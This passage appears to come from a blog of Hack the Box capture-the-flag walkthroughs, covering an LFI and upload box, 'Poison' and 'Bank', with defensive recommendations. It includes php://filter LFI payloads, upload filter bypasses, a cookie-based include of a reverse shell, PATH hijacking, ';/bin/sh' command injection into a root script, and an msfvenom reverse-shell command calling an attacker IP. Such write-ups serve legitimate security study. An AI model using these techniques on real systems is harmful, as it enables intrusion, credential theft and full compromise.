Now we just need to find a way to read the contents of config.php. Enter php://filter and its ability to convert a file’s content to base64 and display it, including that which wouldn’t normally show on a website (such as the underlying php code). To test this out we pass the value below to the page parameter and give resource the file we want to convert to base64.

/?page=php://filter/convert.base64-encode/resource={file to read}

My first test was on the login.php page and it looks like there is a successful LFI (Local File Inclusion) that allows us to successfully get base64 returned where the page would have rendered before. I intercepted the request with Burp Suite to make it easier to modify and send again, then sent the same request one more time.

Cool, we have some base64, but now we need to decode it. Luckily, Burp also has a Decoder we can paste the string into and choose to decode as base64.

After doing this, we see what appears to be the php code used to build the login.php page. Success! Now that we know this works, just in case we need them, I repeated the process for the other files we know exist: index.php, upload.php, and config.php. Checking config.php, we see it does in fact have credentials for the MySQL server.
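The same decode works from the command line if you’d rather skip Burp — shown here with a stand-in string we encode ourselves rather than the real response:

```shell
# Stand-in for the base64 the LFI returns (we encode a sample php snippet ourselves)
encoded=$(printf '<?php $user = "root"; ?>' | base64)
echo "$encoded"
# Decoding recovers the php source, just like Burp's Decoder does
printf '%s' "$encoded" | base64 -d
```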

I used these credentials to connect to the database from my machine. Looking through the database, we see there is only one non-standard database, Users, and only one table within it, users. Dumping the content of this table reveals usernames and passwords (base64 encoded) for three users: kent, mike, and kane.
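Connecting from the attacker machine looks something like this — the host and credentials are placeholders standing in for the values from config.php:

```
mysql -h <target-ip> -u root -p'<password>' -e 'USE Users; SELECT * FROM users;'
```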

I took the first decoded credentials in the list for kent, and was able to login to the site successfully. Now we get an option to upload a file, so the next step will be trying to get a PHP payload to be executed by the server and create a reverse shell.

When I try to upload a .php file used for a reverse shell, it gets rejected stating the extension is not allowed.

I tried again, just uploading a legitimate PNG image this time. It uploaded successfully and rendered the image on the same page automatically. I also checked the page info for the image and it showed the image being stored in the /uploads directory, with a name that appears to be a hash of the file. Manually visiting /uploads shows an open directory of all files that have been uploaded, which at this point is just our one image.

Conveniently, we retrieved the contents of upload.php earlier when exploiting the LFI and can use it to see the logic behind the file upload functionality. When inspecting the code, it appears to go through four different checks before allowing a file to be uploaded.

  • File extension is in the allowed list: .jpg, .jpeg, .gif, .png
  • File type is an "image"
  • File mime-type is an image matching the extensions above
  • The file type can only contain one slash; for example, something like "image/gif/application/x-php" couldn't be used

After looking at these restrictions, it looks like we should be able to upload our PHP file as long as the extension is in the whitelist and the file type is an approved image. I took the same php-reverse-shell.php file as before (named rev.php here for simplicity) and started by adding the magic bytes for a GIF image at the start. This allows me to keep the rest of the PHP content, but the file will be identified as an image. This isn’t strictly necessary as we can change the file type when we intercept the request with Burp in the next step, but it’s still good to know it works.
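The magic-byte trick can be reproduced with a couple of shell commands — the php file here is a stand-in for the real reverse shell:

```shell
# Stand-in reverse shell file (the real one was the php-reverse-shell.php used earlier)
printf '<?php /* reverse shell code */ ?>' > /tmp/rev.php
# Prepend the GIF magic bytes so file-type checks see an image
printf 'GIF89a' | cat - /tmp/rev.php > /tmp/rev.gif
head -c 6 /tmp/rev.gif   # prints GIF89a
```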

Next, I uploaded rev.php and intercepted the request in Burp. We can see the top portion of my reverse shell code and that the content-type is already set to “image/gif”, but we need to change the file name before forwarding the request. I changed the name to “rev.php.gif” to match the content-type, though it doesn’t really need to match as long as it meets the whitelist requirements.

Success! The file was uploaded successfully and it tries to render the image on the page, but fails because it’s obviously just code and not a real image. However, there’s still a problem. When going back to the /uploads directory, we see our GIF and can view the file, but it doesn’t execute any code because it’s being treated as an image.

So, the file is on the server, but we can’t execute it by visiting the file directly. Luckily, one of the other files we downloaded the code for earlier has a parameter we can use. The image below shows a comment in /index.php about how the ‘lang’ parameter would be used to set a cookie, but has not been implemented yet. The code for the potential implementation uses the PHP function include(), which will execute any PHP code in a file whose path is passed through the ‘lang’ cookie.

To execute our code, we intercept a request to /index.php and change the Cookie header to “lang={path to malicious .gif file}”.
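With curl, the request would look something like this — the target and the uploaded file’s hashed name are placeholders, and the include path may need adjusting relative to index.php:

```
curl 'http://<target>/index.php' -H 'Cookie: lang=upload/<hash>.gif'
```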

Unfortunately, we get an error when trying this because I mis-typed the IP address for my Kali machine in rev.php. My bad.

When fixing this, starting a netcat listener, and sending the request again, we get a successful reverse shell connection as the www-data user.

To start out, I transferred the privilege escalation checker linpeas.sh to the machine from mine using a Python web server, made it executable, and ran it.

This is a really nice script that checks common privilege escalation vectors, common misconfigurations, etc. and color codes them based on their usefulness. Unfortunately, it didn’t come back with anything very useful and neither did several other things I looked around at.

At this point, I remembered we found credentials for three users earlier and wanted to try them for the machine, but SSH wasn’t enabled. I was able to log in with kent’s credentials, but found nothing useful in his home directory and no interesting additional permissions. Mike’s credentials didn’t work, but kane’s did and he had an interesting file in his home directory named “msgmike” that was owned by mike.

The “msgmike” file is also set to be executable and when using hexdump on it we can see it’s calling cat on a file in Mike’s directory. Running the file shows the same thing, but gives an error that the text file it’s trying to read doesn’t exist. However, the script doesn’t appear to be using the fully qualified path for cat, i.e. /usr/bin/cat, which means we might be able to hijack the functionality by editing the PATH variable.

First, I created a new file in kane’s directory that simply calls /bin/bash to essentially open a new shell as whichever user runs it, then made it executable.

Next, we need to modify the PATH to have it check kane’s directory for our new cat file before it checks /usr/bin. After the change, the shell reads the PATH variable from left to right and checks kane’s home directory before anything else, thus calling our version of cat when we run the msgmike file. Executing the file, we see that it works and we are put into a new shell as the mike user.
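The hijack can be re-created locally with a harmless stand-in — here the fake cat just prints a marker instead of spawning /bin/bash, and the directory name is illustrative:

```shell
mkdir -p /tmp/hijack
# Fake 'cat' -- the real version in kane's directory ran /bin/bash to spawn a shell as mike
printf '#!/bin/sh\necho hijacked\n' > /tmp/hijack/cat
chmod +x /tmp/hijack/cat
export PATH=/tmp/hijack:$PATH
hash -r                      # drop the shell's cached path to the real cat
cat /etc/passwd              # now runs our fake cat and prints "hijacked"
```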

Now that we can access mike’s directory, we see another interesting file named “msg2root” that appears to echo a string into /root/message.txt. A quick test shows that we can use this file to run multiple commands as root by terminating each with a semi-colon. The second image below shows us creating a test file in mike’s directory that is listed as being owned by root.

The way I ended up abusing this was by creating and compiling a file that runs setuid(0) and setgid(0), then launches bash as user ID 0 (root). Once the file had been transferred to mike’s directory, I called msg2root again and passed it commands to change the owner to root and set the SUID bit, allowing all users to run it as the file owner. Running it immediately puts us into a shell as root.

After doing it this way first, it occurred to me that there was a much simpler way of doing it without needing another file. After changing the path back to its original state, running the file and passing “;/bin/sh” puts us into a shell as root as well.

And that’s that. We have root access and can read the flag.

Recommendations:

  • The only real recommendation here would be to not leave development code on a production website if it is not properly implemented, or at least leave it commented out so it is not functional.
  • The rest of the box was fun, but not incredibly realistic so not much point making recommendations there.

Hack the Box #7 – Poison

This week’s machine was Poison from Hack the Box, a FreeBSD machine rated as medium. I don’t know much about FreeBSD, so it was interesting learning about some of the differences between it and more popular Linux versions. Also I got to practice SSH tunneling, so that was fun.

Running the initial nmap scan shows two ports open: ssh on 22 and http on 80. The additional information shows OpenSSH version 7.2 for FreeBSD from 2016 and a Google search for Apache 2.4.29 shows a release in late 2017. Both of these are pretty old at this point, so we’ll keep that in mind later if we don’t find an obvious exploit.

Initial nmap

Moving over to the browser to check out the web page, we find something that appears to be used for testing PHP scripts on the server. The sites listed to be tested look interesting, so let’s see if they’re in the root directory.

Home page on port 80

Each page loads successfully, with ini.php appearing to be some type of configuration file.

ini.php content

Info.php appears to be the result of running ‘uname -a’ on the server, listing kernel information.

info.php content

Listfiles.php shows an array of items, mostly matching the list of files to be tested on the home page. Of particular interest to us is the ‘pwdbackup.txt’ file that wasn’t listed before.

listfiles.php content
Viewing source of listfiles.php to make it easier to read

Before checking out the pwdbackup.txt file, I was curious what happened if I tried to search for something in the field on the home page. Based on the page below I noticed two things: 1) it’s adding my search term as a parameter in the URL which might be vulnerable to RFI/LFI/directory traversal and 2) it appears to be searching the current directory for a file matching the term I searched for (in this case ‘asda’).

Error shows server searching for local file matching our search term

I didn’t find much of value through #2 above, but the page did turn out to be vulnerable to a directory traversal, allowing me to view the /etc/passwd file on the server. However, the web server appeared to be running under a lower privileged account as I was not able to view more sensitive files such as /etc/shadow.

Local File Inclusion/Directory Traversal to view /etc/passwd

The passwd file was useful in that it gave us a list of users on the box, but I wasn’t able to view much else. On the other hand, when checking out /pwdbackup.txt we see what appears to be a password that has been encoded 13 times.

Contents of pwdbackup.txt
Viewing source of pwdbackup.txt to make it easier to read

The encoded string looks like regular base64, so a quick bash command that pipes the string through ‘base64 -d’ 13 times reveals the decoded password.

Converting base64 encoded string 13 times to get a password
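The loop can be reproduced with a stand-in secret (the real string came from pwdbackup.txt):

```shell
secret='NotTheRealPassword'
data=$secret
# encode 13 times to simulate the backup file, then decode 13 times to recover it
for i in $(seq 13); do data=$(printf '%s' "$data" | base64); done
for i in $(seq 13); do data=$(printf '%s' "$data" | base64 -d); done
printf '%s\n' "$data"    # prints the original secret
```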

Looking at this password, and comparing it to the list of users we saw in /etc/passwd, we see a common name of ‘charix’. Assuming this password is for the user with the same name, I was able to ssh into the machine with that account.

Logging into ssh as ‘charix’

Success! With that we have access to the user flag.

Downloading ‘secret.zip’ file from charix’ home directory

It looks like the home directory for charix also has a file named ‘secret.zip’, which sounds interesting. I downloaded a copy of it with scp and unzipped it. It asked for a password, but it ended up using the same one as the charix user.

Contents of secret aren’t readable

Looking at the content of the secret file, it seems to be a binary that’s not readable. Not much to go on there, so let’s move on to see what else there is to find on the box that charix can see.

Active processes shows tightvnc running

Getting running processes with ps -aux shows an instance of tightvnc is running as root. Interesting.

Server listening on localhost ports 5801 and 5901, used for VNC

Using netstat, we can also see the box is listening on ports 5801 and 5901 on localhost, which are commonly used for VNC (5901) and VNC over HTTP (5801). This is likely our vector for privilege escalation, but the service is only available on the local machine, which means we’ll need to use some port forwarding to be able to access it.

SSH tunnel to access locally running services

I chose to do this through SSH tunneling using the command above to forward both 5801 and 5901 on the box to the matching ports on my machine.
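The forward looks something like this — the target IP is a placeholder:

```
ssh -L 5801:127.0.0.1:5801 -L 5901:127.0.0.1:5901 charix@<target-ip>
```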

Kali machine showing VNC ports listening through ssh

Running netstat on my machine afterward confirms we’re now listening on both ports for VNC. To confirm we can actually access the service, I modified the proxy settings in Firefox and tried to visit my localhost on these ports.

Firefox proxy settings to test ssh tunnel

5801 shows a “File Not Found” message, which doesn’t give us anything, but does at least prove it’s listening correctly as it didn’t give a “Page not found”.

Port 5801

Changing the proxy settings to 5901 and trying again gives the image below, which is standard for VNC, though I’m not sure what it means. Ok, so now we’ve confirmed we can successfully access the VNC service on the remote machine through our local ports. Now we can try to connect directly with VNC.

Port 5901

Normally, we would need to know the password for a VNC session, but TightVNC actually has an option to provide a file as the password for a session. The secret file found earlier sounds more relevant now.

Using secret file as password for tightvnc

Running TightVNC, with the secret file as the password, we’re able to successfully connect to the VNC session and it looks like we’re now running as root. Huzzah!

VNC session to the machine as root

That’s all for this one, so, until next time.

Recommendations

It’s hard to suggest realistic recommendations for some of these machines that are obviously set up to be so unrealistic. We’ll give it a shot though.

  • Leaving a web application that has access to read local files on the web server is obviously a bad idea. Ideally this should only be used in a development environment and removed for production. However, if for some reason this functionality is needed in the final product, it should require authentication before users are able to access it.
  • Passwords should not be re-used. If sensitive files are stored on a machine other users might be able to access, the password to access them should be different than the user’s regular password.

Hack the Box – #3 – Bank

The next machine from Hack the Box is Bank, an Ubuntu web server hosting a website for a…wait for it… a bank.

Starting with the regular nmap scan, we see ports 22, 53, and 80 open, with the default Apache home page showing on the web site.

nmap -sC -sV 10.10.10.29

The first thing I checked was the web page and ran gobuster to try and find any useful sub-directories. However, there didn’t seem to be anything to work with. On a hunch (based on previous HTB machines), I added an entry to my host file to associate the machine’s IP with ‘bank.htb’. Once this was done, visiting bank.htb re-directs to the login page below for a fake bank.
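The hosts entry is a single line (run as root), using the IP from the nmap scan:

```
echo '10.10.10.29 bank.htb' >> /etc/hosts
```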

bank.htb landing page

I tested a few common default credentials, but, not surprisingly, they didn’t work. I re-ran gobuster on http://bank.htb instead of the IP used earlier and found several new directories. Three just held the files used to load the website and nothing sensitive, one I didn’t have access to view, but /balance-transfer looked interesting.

gobuster results for http://bank.htb

Visiting this page gives a list of what appear to be individual bank transactions with encrypted customer information.

List of transactions
Encrypted information in each transaction log

There were a large number of transactions listed on this page and all of them, except one, had a size listed between 580 and 585. The one below stood out for being less than half the size of the others.

Opening this transaction shows clear-text credentials for the customer Christos Christopoulos on a transaction that appears to have failed to be encrypted.

Using these credentials on the bank login page found earlier allows us access to the customer’s dashboard, showing various pieces of account information.

The dashboard also has an option for “Support”, which leads to what seems to be a way of submitting a ticket and allows for a file to be uploaded.

My first reaction was to create a malicious php file with msfvenom and upload it through this page, hoping we can run it somehow on the web server. Below is the command used to generate the php code that was then copied into a file called “shell.php”.

msfvenom php code generated to upload to web server
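A command along these lines generates that payload — LHOST and LPORT are placeholders:

```
msfvenom -p php/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=4444 -f raw -o shell.php
```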

Unfortunately, the site gives an error that only image files are allowed when trying to upload shell.php. Renaming the file with an image extension lets it upload successfully, but that isn’t very useful if we can’t execute the code. After a few other fruitless attempts, I looked at the source code for the page and found a way around the upload limitation using debug functionality that was never removed.

Source code for support.php revealing an extension used for debugging
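Based on that debug comment, the server was presumably configured to hand .htb files to the PHP interpreter, something along these lines (this exact directive is my assumption, not taken from the box):

```
# Hypothetical Apache snippet: treat .htb files as PHP
AddType application/x-httpd-php .htb
```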

I renamed my PHP file to shell.htb and tried the upload one more time. This time it succeeded, and my information/file was listed under the “My Tickets” section on the left side of the page.

File renamed to shell.htb
shell.htb file successfully uploaded

Before clicking the “Click Here” option for my attachment, I started a listener in Metasploit to catch the connection, assuming it was going to work. Luckily, the PHP code executed when the attachment was viewed and connected back to my listener, giving me a meterpreter shell on the machine as the www-data user.
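The listener can be set up with an msfconsole resource script; the payload must match the one baked into shell.php, and LHOST/LPORT are placeholders here:

```
# handler.rc — start a matching multi/handler (LHOST/LPORT are placeholders)
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST <attacker-ip>
set LPORT 4444
run
```

Load it with `msfconsole -r handler.rc` before triggering the upload.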

Now that we’re on the machine, we need to find a way to escalate privileges. Looking for SUID files is usually my first step, so I dropped into a shell from meterpreter and used Python to upgrade it to a fully interactive TTY.
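The usual Python TTY upgrade was enough here (assuming python is present on the target, which it was):

```
# From the dumb shell: spawn a proper TTY, then fix the terminal type
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
```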

From my new shell, I ran a search for any files with the SUID bit set. One in particular stood out, a file called “emergency” in a non-standard directory.
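The search itself is a one-liner with find. The demo below runs against a scratch directory so it is self-contained; on the box the search root was / instead:

```shell
# SUID search demo: create a scratch dir holding one SUID-bit file,
# then find it the same way we'd sweep the real filesystem from /.
tmpdir=$(mktemp -d)
touch "$tmpdir/emergency"
chmod 4755 "$tmpdir/emergency"        # set the SUID bit
find "$tmpdir" -perm -4000 -type f 2>/dev/null
# On the target, the sweep was: find / -perm -4000 -type f 2>/dev/null
```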

Using cat on the file doesn’t give any useful information, as it appears to be a compiled binary, but the binary is owned by root and can be executed by the www-data user. Running the file doesn’t do anything immediately noticeable other than replacing our standard prompt with a #. Testing the prompt reveals it has created a new shell running with an effective UID (euid) of root.

And that’s all there is for Bank. I enjoyed this one, mainly because the last few I’ve done have ended up being pretty basic once you figure out what kind of exploit is needed.

Additional Notes

As this server was also running a DNS service, some additional enumeration could be done around it. I used dig to attempt a zone transfer against the server and found the subdomains below, but they didn’t really help me get anywhere, though it’s very possible (and even likely) that I missed something.
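The zone transfer attempt looked like this (port 53 was open from the initial scan):

```
# Request a full zone transfer for bank.htb from the target's DNS server
dig axfr bank.htb @10.10.10.29
```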

Recommendations

  1. Restrict access to web directories that do not need to be publicly visible.
  2. Enable alerting of some type for when a transaction log fails to be encrypted.
  3. Ensure any additional functionality used for debugging is removed before code is put into production.
  4. Remove the use of files on the server that allow a regular user access to a shell with root privileges. If additional privileges are needed, an account with appropriate privileges should be used.